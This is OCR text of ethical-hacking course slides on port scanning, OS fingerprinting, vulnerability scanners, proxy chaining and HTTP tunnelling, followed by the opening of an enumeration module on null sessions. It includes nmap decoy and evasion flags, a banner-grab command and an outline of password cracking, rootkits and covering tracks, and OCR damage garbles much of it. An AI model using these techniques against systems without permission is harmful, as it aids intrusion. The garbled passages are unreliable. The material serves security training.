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RPC Scan 



© This method works in combination with all other 
port scan methods. 

© 1 1 scans for al I the TCP/ U DP ports and then floods 
them with Sun RPC program null commands in an 
attempt to deter mi ne whether they are RPC ports, 
and if so, what version number and programs they 
serve. 
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Window Scan 



This scan is very much similar to the ACK scan, 
except that it can sometimes detect open ports as 
well as filtered/unfiltered ports due to an anomaly 
i n the TCP wi ndow size reporti ng by some operati ng 
systems. ^^^^^^^^^^^^^^ ^^^B 
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NMAP Scan Options 



© -sT (TcpConnect) 
© -sS (SYN scan) 
© -sF (Fin Scan) 
© -sX (X mas Scan) 
© -sN (Null Scan) 
© -sP (Ping Scan) 
© -sU (U DP scans) 
© -sO (Protocol Scan) 
© -si (I die Scan) 
© -sA (Ack Scan) 
© -sW (Window Scan) 
© -sR (RPCscan) 
© -sL (List/ Dns Scan) 
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NMAP Scan Options 



© -PO (don't ping) 
© -PT (TCP ping) 
©-PS(SYN ping) 
©-PI (I CMP ping) 
©-PB(=PT+PI) 
© -PP (I CM P ti mestamp) 
© -PM (ICMP netmasl<) 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



NMAP Output Format 



© -oN(ornnal) 
© -oX{ml) 
© -oG{repable) 
®-oA(ll) 



N M AP Ti mi ng Opti ons 



© -T Paranoid - serial scan & 300 sec wait 

© -T Sneaky- serial ize scans & 15 sec wait 

© -T Polite - serializescans& 0.4 sec wait 

© -T Normal - parallel scan 

© -T Aggressive- paral lei scan & 300 sec ti meout & 125 sec/ probe 

© -T I nsane - paral lei scan & 75 sec ti meout & 0.3 sec/ probe 

© —host timeout— max rtt timeout 

(default -9000) " " 

© — min rtt timeout —initial rtt timeout 

(defauft- 6D00) " " 

© — max_ parallelism — scan_ delay (between probes) 
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NMAP Options 



© —resume (scan) — append_ output 

© -iL <targets_filenanne>-p <port ranges> 

© -F (Fast scan nnode) -D <decoyl[,decoy2][,ME],> 

© -S <SRC_ I P_ Address> -e <i nterface> 

© -g <portnunnber>--data_ length <nunnber> 

© --randomize_ hosts -O (OS fingerprinting) -I (dent-scan) 

© -f (fragnnentation) -v (verbose) -h (help) 

© -n (no reverse lool<up) -R (do reverse I ool<up) 

© -r (dont randonnize port scan) -b <ftp relay host> (FTP bounce) 
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PSecScan 




ipEye 1.2 - <c> flrne Uidstron Carne .uidstronPntsecurity .nu> 

- http://ntsecuritiF.nu/toolbox/ipeiFe/ 



Error: Too few parameters. 
Usage : 

ipEye <target IP> <scantifpe> -p <port> [optional parameters] 

ipEye <target IP> <scantype> -p <fron port> <to port> [optional parameters] 

<scantype> is one of the following: 
-si/n = SVN scan 
-fin = FIN scan 
-null = Null scan 
-xnas = Xnas scan 

<note: FIN, Null and Xnas scans don't worlt against Windows systens . 

[optional parameters] are selected from the following: 
-sip <source IP> = source IP for the scan 
-sp <source port> = source port for the scan 

-d <delaii in ns> = delai/ between scanned ports in nilliseconds 

<default set to 75Q ns>| 



I PSecScan is a tool that can scan either a single I P address or 
a range of I P addresses looki ng for systems that are I PSec 
enabled 
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NetScan Tools Pro 2( 



^- i NetScanTools Pro 2003 (TM) 



DHCP I NetBioslnfo | Network Info and Stats | Email Validate | SMTP Email Generator^'Relav Test || Arp 
TTCP j What's New at NWPSW j TCP Term ] NetTopography | TimeSync | Finger | Launcher ] Simple Services 

Database Tests 
OS Fingerprinting | 
Name Server Lookup 



IDENT Server 



Winsock Info 



Preferences 



RFC Reference j About 



RFC Info 
1 Ping 



IP Packet Viewer 
TraceRoute \ 



I IP/MAC Address Management 1 Subnet Calculator j Detection 
Whois I NetScanner 

Port Probe | SNMP | HyperTrans 



■Image Key — 

s»mm 4 

Images have 
tooltips. 



Probe Single Host 
Probe IP Range 
Target Hostname or Start IP Address 

End IP Address 
|localhost 



n Sho^^ non-responding ports 
Start Port Connection Timeout (ms) 



End Port 



G5535 



|100 ^ 

Wait After Connect [ms) 

Fooo 



RearJv- 



SI Target Computer List 




Q-M 192.168. 










00021 


- TCP 


- ftp - response: 3 msec 






# 00023 


- TCP 


- telnet - response: 3 msec 






• 00025 


- TCP 


- smtp - response: 0 msec 






• 00080 


- TCP 


- http - response: 3 msec 






00110 


- TCP 


- pop3 - response: 0 msec 






9 00280 


- TCP 


- http-mgmt - response: 3 msec 






9 OOSIS 


- TCP 


- printer - response: 3 msec 






# 00631 


- TCP 


- ipp - response: 3 msec 


_ 




05120 


- TCP 


- unknown - response: 3 msec 






# 05121 


- TCP 


- unknown - response: 3 msec 


^1 











|l92.1G8.0m j-J 



Seq Probe 



Probe Port List 



Seq Target List 



Porti'Target List 



Stop 



Edit Target List 



Edit Port List 



Setup 



Create Reports 



□ear Results 



Print 


Save 


HTML 


Find 


Copy 


<■> 


Email 


RFCs 


Navigate 


Help Wizard 


Exit 


Help 
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It is used to 

1 determine ownersliip of 
I P addresses, 

2. translate IP addresses 
to hostnames, 

3. scan networks, 

4. port probe target 
computers for services, 

5. validate email 
addresses, 

6. determine ownership of 
domains, 

7. list the computers in a 
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Super Scan 



SuperScan 3.00 



JflJxJ 



-Hostname Lookup - 



I target, com 

Resolved [targejcom" 



Lookup 



Me I Interfaces | 



Configuration 

Port list setup 



Start|G4.3x.3x.>:>:>: 

StOp|G4.3K.3K.KKK ^ 

PrevC| Nentc| 1..254| 



P' Ignore IP zero 
\^ Ignore IP 255 
n Extract from file -> | 



Timeout 

Ping 
[400 

Connect 
|2000 

Read 
|4000 



Resolve hostnames 
W Only scan responsive pings 
W Show host responses 

Ping only 
(* Every port in list 
C All selected ports in list 
r All list ports from [l 1 65535 
C All ports from [l~ 



- Scan type- 



'1^ 



-Speed -I [ 



-Scan- 





|64.3 




IScanninq 




|64.3; 






■ 


1 1 0 




i^^l Slaitj 


stop 




Save I 
Collapse all | 
Expand all 



B-y 64.33,30.117 

25 Simple Mail Transfer 
h - • 80 World Wide Web HTTP 

^-m HTTP^I.1 200 OK.. Server: Microsoft-IIS/4.0.. Cache-Control: ro-cache.. Expires: Sun, 20 Apr 2003 14:40:08 GMT..Cc 
i- • 110 Post Office Protocol ■ Version 3 

'■■■m +0KX1 NT-POPSServer^H ™ ("^311515 227181-2).. 
i-» 135 DCE endpoint resolution 
i- • 1 43 I nternet f^ essage Access Protocol 
1032 BBNIAD 
5G31 pcANYWHEREdata 
i-» 5800 Virtual Network Computing server 
i » 5800 Virtual Network Computing server 
^-m RFB 003,003, 



1 1 is a TCP port scanner, pi nger and hostname resol ver. 1 1 can perfornn 
pi ng scans, port scans usi ng any I P range and scan any port range f ronn a 
built in list or specified range. 
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FloppyScan 



© Floppyscan is a 
dangerous hacking tool 
wliicli can be used to 
Dortscan a system using a 
loppy disl< 

© Bootsup mini Linux 

© Displays Blue screen of 
death screen 

© Port scans the network 
using N MAP 

© Send the results by e-mail 
to a remote server 
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Irteresting pcate on 192.168.100.5: 

(The 1646 pcate scanned but not shown below are in state: dosed) 
PORT STATE SERVICE 
53/tcp open domain 
88/tcp open kerberos-sec 
135/tcp open msrpc 
139/tcp open netbLos-ssn 
389/tcp open Idap 
445/tcp open microsoEt-ds 
464/tcp open kpasswdS 
593/tcp open http-rpc-epmap 
636/tcp open IdapssL 
1025/tcp open NFS-or-IES 
1026/tcp open LSA-or-nterm 
3268/tcp open gLobalcatLDAP 
326 9/tcp open gLobalcatLDAP sal 
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War Dialer 



© War dial i ng i nvolves the use of a program i n 
conjunction witli a modem to penetrate the 
modem- based systems of an organization by 
continually dialing in. 

© Companies do not control the dial-in ports as 
strictly as the firewall, and machines with modems 
attached are present everywhere 

© A tool that identifies the phone numbers that can 
successfully make a connection with a computer 
modem 

© It generally works by using a predetermined list of 
common user names and passwords i n an attempt 
to gai n access to the system 
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Wardialing 
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TH C Scan 




Scan Mode 

Dial Mode : IPMffeOM 
Manual/ Autonom Mode 

CARRIER Hack Mode : NUDGEi Nudge Delav = 601 

Nudge : ^~^'-^~^~^~^H^'-'^H?^M'^~lielp^H'^~^"^~guest^M' 



guest^M — I NFO'^M^MLO 



Timeout 
R in gout 



501 
6 



seconds 
seconds 



Redial Busv 
BUSV Overwrite 



VES 
NOi 



Calculate Elapsed Time 

Auto DAT save time : 10 
DATA save exceptions : 0^ 
DAT Filename calculation 



201 



VES NO DIALTONE exit 
minutes 

Delete Left + Delete Special| 



It is a type of War Dialer that scans a defined range of 
phone numbers 

Another tool for wardialing is PhoneSweeper 
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PortScan Plus, Strobe 



L 



© PortScan Plus 

• Windows- based scanner developed by Peter Harrison 

• The user can specify a range of I P addresses and ports to 
be scanned 

• Wlien scanning a liost or a range of liosts, it displays the 
open ports on those hosts 

©Strobe 

•A TCP port scanner developed by J ulian Assange 
•Written i n C for U N I X- based operati ng systems 
•Scans all open ports on the target host 
•Provides only limited information about the host 
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© A TCP port scanner for U N I X- based operati ng 
systems 

© Ping target hostsfor examining connectivity 

© Scans subnets on a networl< 

© Examination of FTP for anonymous access 

© Examination of CGI bugs 

© Examination of P0P3 and FTP for brute force 
vulnerabilities 
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Banner grabbing 




OS Fingerprinting 



© OS fi ngerpri nti ng is the term used for the method 
that is used to deter mi ne the operati ng system that 
is running on the target system. 

© The two different types of f i ngerpri nti ng are: 

• Active stack f i ngerpri nti ng 

• Passive fingerprinting 
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Acti ve Stack F i ngerpri nti ng 



© 1 1 is based on the fact that various vendors of OS 
implement theTCP stack differently 

© Specially crafted packets are sent to remote OS 
and response is noted 

© The responses are then compared with a database 
to determi ne the OS 
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Telnet 



© You can use telnet to for banner grabbing 

teln^ WW w . xsecudty. com 80 
HEAD /HTTP/1.0 



c v Cominand Prompt 



In] X 



HTTP/1.1 200 OK 

Server: Microsoft - 1 IS/5. 0 

Date: Thu, 07 Jul 2005 13:08:16 GMT 

Content -Length: 1270 

Content-Type: text/html 

Set -Cook i e7°ASP§ESsf ON I DQCQTCQBQ=PBLPKEKBNDGKOFF I POLHPLNE ; pat h =/ 
Via: 1.1 Application and Content Networking System Software 5.1.15 
Connection: Close 



Connection to host lost. 



C:\> 
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Tool s for Acti ve Stack F i ngerpri nti ng 



I 



©XPR0BE2 

1 1 is a remote OS detection tool which determines the OS 
running on the target system with minimal target 
disturbance. 

©RINGV2 

http : / / www, sys- secu r i ty . com/ 

This tool is designed with a different approach to OS detection 
This tool identifiestheOSof the target system with a matrix 
based fi ngerpri nti ng approach. 

M ost of the port scanni ng tools I i ke N map are used for active 
stack fingerprinting 
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Passive F i ngerpri nti ng 



© Passive banner grabbi ng refers to i ndi rectly scan a 
system to reveal its serve operati ng system 

© It is also based on the differential implantation of the 
stack and the various ways an OS responds to it 

© It uses sniffing techniques instead of the scanning 
techniques 

© It is less accurate than active fingerprinting 
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N etcraft 



© N etcraft website ( http: / / www. n etcraft. com ) can be used to i denti ty 
remote OS of a target system passively 
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Site report for Mninv.£s<xiuiidLorg - mGrosoft Internet Explorer 








J File Edit View Favorites Tools Help 










] Q Back ^ i J ^ ^ ^ 


) Search '■^^ Favorites 








J Address ^ http ; //toolbar , netcrat^, com/3ite_report?url =www . eccouncil .org 






J Links ' 




^ Search Web • 


0 \ ^7S1 blocked "g] AutoFill 


1 ^ Options ^ 





riETCR^FT 




LY MANAGED HOSTING FROM HOSTWAY 
Manage You r Business. NDt Your Sei^r 



HOSTWAV 



Toolbar 



Netcraft 



sae report for www.eccoijncil.org 





http :/ /vivtvi. SLCounzW .org 




Last reboot 


I9 dayi ago 


Domain 


eccouncil .org 




Netfalock 
owner 


The Nev^ York Internet Company 


IP addre&B 


G4.90.L7e.L0 




Site rank 


55901 


C our try 


D us 




NameBerver 


authl.na.nyi.net 


Date first 
Been 


Februar,^ 2002 




DNS admin 


s u p p o rt'Ji n y i , n et 


Domain 
Registry 


publicintere5tregiEtrv.net 




Re vefse 
DNS 


G4,90,l7S,10,nyinternet,net 


□ rganis-ation 


International Council oF E-Commerce 
Consultants, 57 Wall Street, 22nd Floor, 
NewYork, 10005-3193, United States 


Nameserver 
□ rganisation 


The NewYork Internet Company, 20 
Ejichange Place, 2Lst Floor, New York, 
IOOOd, United States 



Check 

another site: 
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Vul nerabi I i ty scanni ng 
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1 



SAINT 



©It is also known as Security 
Administrator's I ntegrated 
Network Tool. 

© 1 1 detects the network 
vulnerabilities on any remote 
target in a non- intrusive 
manner. 

© 1 1 gathers i nf ormati on 
regard i ng what type of OS is 
running and what all ports 
are open. 
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4 Steps to a SAINT™ Scan 



ENGINE 




< 




1> FINDTAHaETS 
HOSIISMIVE 

Z;> PORT SCAN 
HTTP SERVICE RUNNING ^ 

^ HnPVULN. CHECK 
US S VUiHERABlUn!^^ 



pRVER 



■Executive Summary 
■Detailed Technical Reporls 
■Recommendeid FiiES 
■Trend ftnal^sis 
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ISS Security 



©I nternet Security Scanner 
provi des automated vul nerabi I ity 
detection and analysis of 
networl<ed systems. 

©It performs automated, 
distributed or event-driven 
probes of geographi cal ly 
dispersed network services, OS, 
routers/ switches, fi rewal Is and 
applications and then displays 
the scan results. 
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Nessus 



I 



© N essus i s a vu I nerabi I i ty 
scanner, a program that looks 
for bugs i n software. 

©An attacker can use this tool 
to violate the security aspects 
of a software product 




Features 

© PI ug-i n- architecture 

©NASL ( Nessus Attack 
Scripting Language) 

©Can test unlimited number 
I of hosts at a same ti me. 

^© Smart service recognition 

^©Client- server architecture 

^© Smart plug- ins 

© U p- to- date secu r i ty 
vu I nerabi I ity database 
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Screenshot Of Nessus 



.1 DiJutle 



■.(i^ So™ pat: 

Pcpt xswe(l(ip*afeJ.(nia«t 

=|ghifiRTnifnMUI{fl»[: 
^^^akRTITiiJflffliiinil: 
^hii*Rniii«jJ|tfit] 
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GFI LANGuard 



©GFI LANGUARD 

analyzes the operati ng 
system and the 
applications running on a 
network and f i nds out the 
security holes present. 

©It scans the enti re 
network, I P by I P, and 
provides information such 
as the servi ce pack I evel of 
the machine, missing 
security patches, and lot 
more 



'I GFI LANguar(IS.E.L.M. 5.0 Configuration 



Action View Help 



[] Console Root 

LANguard 5,E,L,M, 5,0 Configuration 
Computet s to monitor 
B" Jl Evert Processing Rules 
S" J Security event log 
B''' J Application event log 
■J NOISE Reduction 
■J ISA Server Important Events 
■J SQL Server Important Events 

jilBHMii 

■J IIS 6 Important Events 
■J IIS 5 Important Events 
■J Windows Installer 
■J Security Applications 
■J DNS Server event log 

; J Directory Services event log 

i y| File Replication Service event log 

B- Jl System event log 

■ y| GFI Applications event log 

■§ Alerting Options 
^ Database Maintenance Options 
W General 



Exchange Server Important Events 52 rule(s) 



Description 



^Out of memory exception 
^Incorrect client permissions to access ADC p, , , 
^Unable to open LDAP session on directory 
^(Disk space) Unsuccessful LDAP search result,, 
5 (Disk space) operation on server returned a, , , 
5 Domain server unavailable 
^Unsuccessful LDAP Unbind on directory 
^(Service) ADC service was stopped 
^(Service) The service threw an out of memor,, 
^ADC will not replicate entry 
^(Service) ADC service threw an unexpected , , , 
^Database error occurred while accessing the ,, 
^Mailbox storage limits and permissions 
3 (Service,Disk space) Unable to start the Micr, , , 
vj (Service,Disk space) The Information Store s,, 
^ Database maximum size reached, 
^ (Corruption) Unable to start the Microsoft Ex,, 
(Disk space) Message processing failed, 



Exchange out of memory exec 
Incorrect client permissions to 
Unable to open LDAP session i 
Unsuccessful LDAP search resi 
Exchange operation on server 
Couldn't find an accessible wrif 
Unsuccessful LDAP Unbind on 
Active Directory Connector se 
The ADC service threw an out 
Required attribute(s) are missi 
ADC service threw an unexpei 
Database error occurred in a f 
Permission rule issues on a ma 
Unable to start the Microsoft E 
Unable to initialize the Microso 
The Exchange database has r 
Unable to start the Microsoft E 
Message processing failed 
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GFI LAN Guard Features 



© Fast TCP and UDP port scanning and identification 
© F i nds a! I the shares on the target networl< 
© It alerts the pin point security issues 
© Automatically detects new security holes 
© Checks password policy 

© Finds out all theservicesthat are running on the target 
network 

© Vulnerabilities database includes UNIX/ CGI issues 
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SATAN (Security Admi nistrator's Tool 
for Ana lyzing Networks) 



© Security-auditing tool developed by Dan Farmer and Weitse 
Venema 

© Exanni nes U N I X- based systems and reports the 
vulnerabilities 

© Provides i nformation about the software, hardware and 
network topologies 

© User-friendly program with an X Window interface 

© Written using C and Perl languages. Thus to run SATAN, the 
attacker needs Perl 5 and a C compiler installed on the 
system. 

© I n addition, the attacker needs a UNIX- based operating 
system and at least 20M B of disk space 
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Retina 



Retina network security scanner is a network 
I vulnerability assessment scanner. 

'© It can scan every machine on the target network 
i ncl udi ng a vari ety of operati ng system pi atforms, 
networking devices, databases and third party or 
custom applications. 

[© 1 1 has the most comprehensive and up-to-date 
vul nerabi I ity database and scanni ng technology 
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Reti na: Screenshot 




Retina - [Untitled] - EVALUATION VERSION - 14 Days Remaining 



File Edit Vie^A^ Action Tools Help 




Retina 



Browser 
Miner 
Scanner 
Tracer 



Find 



Oa 192.1G8.000.044 






■ 


Geneial 


192.168.000.044 




— 






Address 


192.168.0.44 


— 






Report Date 


08/1 2/03 03:04:32 PM 








Domain Name 


neo. of fice. upstream, se 








Ping Response 


Host Responded 








Avg Ping Response 


10 ms 








Time To Live 


128 








Traceroute 


192.168.0.44 








Audits 


192.168.000.044 








4- 


NetBIOS 


Null Session 






* 


Remote Access 


PCAnvwhere 






a 


IP Services 


TCP IP Securitii 








□ 


Registry 


Auto Sharing Drive Problem 


NT Server 






□ 


Registry* 


Auto Sharing Drive Problem 


NTWks 






□ 


Registry* 


MS RAS Logging 






□ 


Registry 


MSCHAPv2VPN 






□ 


Registry 


NTFS 8 Dot 3 






□ 


Registry 


Printer Driver Sec 






□ 


Registry 


Shutdown without Logon 






□ 


Remote Access 


DCOM Enabled 






□ 


Remote Access 


Dialup Save Password 
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llP Services: TCP IP Security 




Description: 


TCP/IP Security is not enabled. It is recomnnended for maximum security that you set up strict 
settings as to what ports you will allow incoming data to go to. For examplOj if your server only 
acts as a web server you should set the TCP/IP security options to be: 
TCP Permit Only; 30,443 
UDP Permit Only; none 
IP Permit All 




Risk Level: 


Medium 




How To FiK: 


To configure TCP/IP security settings; 
1. Open Control Panel 





Support 



Links 



Did you know... 

Vou can easily enter' a range of IP Addresses to scan from the Scanner Interface by typing CTRL + R. 



Scan complete 
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NIKTO 



©N I KTO is an open source web server scanner. 

©It performs comprehensive tests agai nst webservers for 
multiple items. 

© 1 1 tests web servers i n the shortest ti me possi bl e 
©Uses RFP's libwhisker as a base for all network functionality 
©For easy updates, the mai n scan database is of CSV format 
©SSL support 

©Output to file in simple text, html or CSV format 
©Plug-in support 

©Generic and server type specific checks 
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SAFEsuite I nternet Scanner, 
I dentTCPScan 



© SAFEsuite I nternet Scanner 

• Developed by I nternet Security Systems (I SS) to examine 
the vulnerabilities in Windows NT networks 

• Requirements are Windows NT 3.51 or 4.0 and product 
license key 

• Reports al I possi bl e security gaps on the target system 

• Suggests possible corrective actions 

• Uses three scanners: Intranet, Firewall and Web Scanner 

©I dentTCPScan 

•Examines open ports on the target host and reports the 
services running on those ports. 

•A special feature that reports the U I Ds of the services 
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Draw network diagrams of vulnerable 

hosts 
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Cheops 




Oieops Network User Interface 



File Page 



Friends 



Heip 




207. 230.72. 26 



207.230.72.! 



Saved Vroof.ctieops-map' 



It is a network management tool that can be used for OS detection, mapping, 
to find out the list of services running on a network and generalized port 
scanning etc. 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



FriendlyPinger 



1 f Friendly Pinger [Demo.map] 


JnJxl 


File Edit View Ping Notification Scan Connections Inventory Help 


D □ H 


% X . 


. ^ -JG- *4 ^ 


J 51 




Reboot 
Telnet 



0 



Open 
^ Open in WinCmd 
SJ, Select in FChat 



El/ Edit 




? Align 




^ Ping, Trace 


> 


'Q: Notification 




^ Inventory,., 





5et Device Type > 
Configure Device Type. , . 



pinging,. 



Configure Device... 



It is a powerful and user-friendly application for network adnninistration, 
nnonitoring 

It can be used for pinging of all devices in parallel at once and in assignnnent of 
external connnnancis (I ike telnet, tracert, net.exe) to devices 
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Scenario 



J ack traces the I P address of the company's Web 
Server and then runs several types of N map scans 
to f i nd the open ports and hence the servi ces 
runni ng. As presumed by hi m most of the 
unnecessary services were running. It provided 
hi m the perfect ground to exploit the 
vulnerabilities. 

• Which Services do you think that J ack would target? 

• Can J ack use the open ports to send commands to a 
computer, gai n access to a server, and exert 
command over the networki ng devices? 

• What are the counter measures agai nst Port 
Scanning? 

• How can firewalls beevaded during scanning? 
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Preparing proxies 
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Proxy Servers 



© Proxy is a network computer that can serve 
as an intermediate for connection with 
other computers. 

© They are usual ly used for the fol I owi ng 
purposes: 

• As a f i rewal I , a proxy protects the I ocal 
network from outside access. 

• As I P-addresses multiplexer, a proxy allows to 
connect a number of computers to I nternet 
when havingonly one! P-address 

• Proxy servers can be used (to some extent) to 
anonymize web surfi ng. 

• Speci al i zed proxy servers can f i I ter out 
unwanted content, such as ads or 'unsuitable' 
material. 

• P roxy servers can afford some protecti on agai nst 
hacking attacks. 
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Free Proxy Servers 




© Thousands of free 
proxy servers are 
avail able on the 
I nternet 

© Search for "free proxy 



© 



servers 



1 n googi e 

Sonne of thenn nnight be 
honeypot to catch 
hackers red handed 



'3 Google Search: free proKy servers - 


Microsoft Internet Explorer 






File Edit 


View Favorites Tools Help 






^Back - 




^Search ^Favorites ^ Media ^ 




Address |^ 


ittp; //www, google, conn/search?connplete=l 6(hl=en6(q=f ree+proxy+servers 




Google - 


free proxy servers 




^Search Web - ^Search Site 




0 l53311 blocked "^Al 



Go oqIc ( 

Suggest O beta 



Web Images Groups News Froogle Local more » 
|free proxy servers Search 



Advanced Search 
Preferences 



Web Results 1 

FREE PUBLIC PROXY SERVERS LIST: H^P, H^PS, CONNECT, IRC, SOCKS .■. 
FREE PUBLIC PROXY SERVERS LIST WWW, FTP, IRC, SOCKS, TELNET, WINGATE. 
tools.rosinstrument.com/proxy/ - 9k - Cached - Similar pages 

Proxy 4 Free: Proxy List - Page 1 

ProxyWay is a Free proxy server agent (proxy software) which you use together with ... 
Also it can be used as a simple local proxy server. Free version of... 
www.proxy4free.com/page1 .html - 45k - 8 Jul 2005 - Cached - Similar pages 

Proxy 4 free - Free Public Proxy Servers: Home 

List of thousands free anonymous proxy servers. Updated daily. 
¥/ww. proxy4free.com/ - 15k - Cached - Similar pages 

FREE PROXY servers: free lists, detailed proxy FAQ, programs .■. 

Free proxy servers. Information about check free proxy lists and how to work with free 
proxy list. Programs: Proxy List Filter, Proxy Checker, DNS Resolver, ... 
www.freeproxy.ru/ - 19k - Cached - Similar pages 
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L J 



U se of P roxi es for Attacki ng 




SocksChai n 



I 



© SocksChai n is a program that allows to work through a chain 
of SOCKS or HTTP proxies to conceal the actual I P-address. 

© SocksChai n can function as a usual SOCKS-server that 
transmits queries through a chain of proxies. 



SDcksCap Setup 



r server 

SOCKS Server: 

SOCKS User ID: 



127.0.0.1 



^Port: |lO0O^| 



^3 



rotocol- 



C Socks4 Ct ^ocksS 
r Suppor:ed AuthsnticatioT 

r GSEAPI 

n UseTiame/Password 



rName Resolution 

^ Resdve all names locally 
(• Resdve all names remoteli) 
^ Attempt local then remote 
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Anonymizers 



© Anonymizers are services that he! ps to 
nnal<e web surf i ng anonymous. 

© The first anonymizer developed was 
Anonymizer.com, created in 1997 by 
Lance Cottrell. 

© An anonymizer removes all the 



identifying information from a user's 
computers whi le the user surfs the 
I nternet, thereby ensuri ng the privacy 
of the user. 
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Surfi ng Anonymously 



Bypasses the 




www.target.com 
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Httptunnel 



I 



©It is used to create bidirectional virtual data path tunneled in 
HTTP requests. 

©The requests can be sent via an HTTP proxy if so desired. 

© 1 1 can be used to bypass f i rewal I s. 



C:\WINDOWS\System32\cmd.exE 



Funnel 3.3>}itc —help 

Jsage: litc [OPTION]... HOSI[:PORI] 

Set up a httptunnel connection to POPT at HOST <default port is S8SS>. 
IJlien a connection is made, I/O is redirected from the source specified 
by the — deuice, — foruard-port or — stdin-stdout suitch to the tunnel. 



i, — proxy-authorisation USER: 
!, — proxy-authoriaation-f ile 
i, — proxy-buff er-sise BVTES 

— content-length BVTES 

J, —device DEUICE 

?, — foruard-port POPT 

^, — help 

(, — keep-aliue SECONDS 

1, — nax-connection-age SEC 

\ —proxy HOSTNAME! :POPT] 
— stdin-stdout 

— strict-content-length 
r, — tineout TIME 

J, — user-agent STRING 
), — uersion 
J, — no-daemon 



PASSUORD proxy authorisation 

FILE proxy authorization file 

assune a proxy buffer size of BVTES bytes 

Ck, M, and G postfixes recDgnized> 

use HTTP PUT requests of BVTES size 

Ck, M, and G postfixes recDgnized> 

use DEUICE for input and output 

use TCP port PORT for input and output 

display this help and exit 

send keepaliue bytes every SECONDS seconds 
(default is 5> 

maxinum tine a connection uill stay 
open is SEC seconds (default is 300> 
use a HTTP proxy (default port is 80805 
use stdin/stdout for comnunication 
(implies — no-daemon> 

always write Content-Length bytes in requests 
timeout, in milliseconds, before sending 
padding to a buffering proxy 
specify User-Agent value in HTTP requests 
output version information and exit 
don't fork into the background 
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HTTPort 



I 



>* HTTPort 3.SNF 



□lid 



System Proxy j p^rt mapping | About | Register | 
HTTP proxy you nesd to bypass 



Host name oc IP addrsssi 



r 



Proxy options ■ 

r" Authorize 
User name i 



Other options: 

User-Agent! 

|lE 6.0 ^ 

Bypass mode : 

I Remote host ^ | 



■ Use personal remote host at (if blank, use public) ■ 
Hostname or IP address: Port: Password: 

I F I 



? I f — This button helps 



System | Proxy Port mapping ] About | Register | 
Static TCP/IP port mappings (tunnels) 

li]" Yahoo! POPS 

[t] - External HTTP proxy (sample) Rsmov 
[+]■■ Microsoft News server 
[¥]■■ IRC server (sample) 
[t] - Microsoft Outlook POPS 
[t] - Microsoft Outlook SMTP 



■ Built-in SOCKS4 server 

[7 Run SOCKS server (port lOSO) 
Available in "Remote Host" mode: 
n Full SOCKS4 support (BIND) 



? I ^ — This button helps 



Select a mapping to se 


e statistics: 


No stats - inactive 




n/a X n/a B/sec 


n/a K 



□□□□ 

O Proxy 



HTTPort (client) and HTTHost (server) are free tools which can be used to tunnel 
^^any TCP traffic through HTTP protocol 

Visit http://www.htthost.com for nnoreinfornnation. 
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Counter measures 



I 



© The firewall of a particular network should 
be good enough to detect the probes of an 
attacker. The firewall should carry out 
stateful inspection with it having specific 
rule set 

© Network intrusion detection systems 
should be used to find out the OS detection 
method used by some tools such as N map 

© Only needed ports should be kept open 
and the rest should be filtered 

© All the sensitive information that are not to 
be disclosed to the public over the internet 
should not be displayed 
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ATTACK ! ! 
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Summary 



© Scanning isoneof three components of intelligence 
gatheri ng for an attacl<er 

© The objective of scanni ng is to discover I i ve 
systems, active runni ng ports, the Operati ng 
Systems and the Services runni ng on the network. 

© Some of the popular scanni ng tools are N map, 
Nessusand Retina. 

© A chai n of proxies can be created to evade the 
traceback of the attacker. 
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Ethical Hacking 



Module IV 
Enumeration 



Scenario 



I 



1 1 was a rai ny day and J ack was getti ng bored si tti ng at home. H e 
wanted to do sonne work rather than gazi ng at the sky. J ack had 
heard about enumerating user accounts and other important 
i nformation from systems usi ng N ull Sessions. H e wanted to try out 
what he had learned in hi si nformation security class. His friends told 
hi m that the university website had a flaw where anonymous users 
could log in. 

J ack had installed an application which used Null Sessions to 
enumerate systems. He tried out the application and to his surprise 
he got a I i st of i nf ormati on about the system where the webserver was 
hosted. 

What had started as fun became serious stuff ..J ack started having 
some evil thoughts after seeing the vulnerability.. 

What can J ack do with the gathered information? 

Can he create a chaos? 

What if J ack had enumerated a vulnerable system meant for online 
trading? 
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Module Objectives 



© Understanding Windows 2000 Enumeration 

© Howto Connect via a Null Session 

© Howto Disguise NetBIOS Enumeration 

© Disguise using SN MP Enumeration 

© How to Steal Windows 2000 DNS 
Information Using Zone Transfers 

© Learn to Enumerate Users via CI FS/ SM B 

© Active Directory Enumerations 
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Modu eF ow 



Overviewof SHC 



for Enumeration 



Enumerating User ^ 
Accounts 



Tools Used 



Tools Used 



► 



TOrm 



ser 



- Countermeasure 



SNMP Enumeration . " SN M P UtiT^ 



Counter measures 



xampi 



001 s: wi 



Printer 



Fn.imPr;.1-inn 



What is Enumeration 



Establishing 
Null Session 



SN M P Scan 




SNMP Enumeration 



vctive Pi rectory 
-► Enumeration 
, Counter measures 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Overvi ew of System H acki ng Cycl e 



Step 1: 

Enumerate 
users 



Extract user names using: 
i win 2k enumeration 
ll SNMP 
P email IDs 




Step 6: 

Cover your tracks 




Cover your tracks using 
applications like: 
auditpols 



Step 2 : 

Crack the 
password 



Step 3: 

Escalate 
privileges 



Crack the password using: 
Brute 

Lophat crack 
J ohn the ripper 




Escalate privileges 
using: 

GetAdmin 



Step 5: 

Hidden files 




Extract hidden files using: 
steganography 
P image hide 
^ mp3 




Execute applications such as: ^ 

Lkey loggers 
root kits 
pstools 
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What is Enumeration 



I 



© Enumeration is defined as extraction of user names, 
machine names, networl< resources, shares and 
servi ces. 

© Enumeration techniques are conducted in Intranet 
envi ronment. 

© E n u merati on i n vol ves acti ve con necti ons to systems 
and directed queries. 

© The type of information enumerated by intruders: 

• Networl< resources and sliares 

• Users and groups 

• Applications and banners 

• Auditing settings 
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Techniques for Enumeration 



© Some of the techniques for Enumeration are 

• Extract user names using Win2k enumeration 

• Extract user names usi ng SN M P 

• Extract user names using E-mail id 
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Net Bios Null Sessions 



© The nul I session is often refereed to as the H oly Grai I of 
Wi ndows hacl<i ng. N ul I sessions tal<e advantage of flaws 
in theCIFS/SIV|B (Common Internet File System/ 
Server Messaging Block). 

© You can establish a null session with a Windows 
(NT/2000/XP) host by logging on with a null user 
name and password. 

© Using these null connections allows you to gather the 
following information from the host: 

• List of users and groups 

• List of nnachines 

• List of shares 

• Users and host SI Ds (Security I dentifiers) 
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Anyone with a NetBIOS 
connection to your computer can 
easily get a full dump of all your 
user names, groups, shares, 
